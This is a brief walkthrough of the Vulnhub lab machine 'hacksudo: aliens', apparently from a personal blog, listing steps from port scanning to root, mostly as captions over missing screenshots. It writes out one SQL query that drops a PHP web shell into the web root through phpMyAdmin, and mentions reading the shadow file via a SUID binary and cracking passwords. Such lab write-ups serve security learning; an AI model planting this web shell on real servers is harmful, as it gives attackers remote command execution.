Vulnhub hacksudo: aliens Walkthrough

https://www.vulnhub.com/entry/hacksudo-aliens,676/


Scan ports.

图片.png


Scan port 80.

图片.png


In /backup/mysql.bak, found credentials.

图片.png


Log in phpmyadmin at port  9000 using this credentials. Create a shell php.

SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/shell.php"



Get reverse shell.

图片.png


Check SUID files.

图片.png


Use date to read shadow.

图片.png


Crack hacksudo's passwd using john.

图片.png


Log inssh  as hacksudo, check SUID files again.

图片.png


Get root.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年5月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2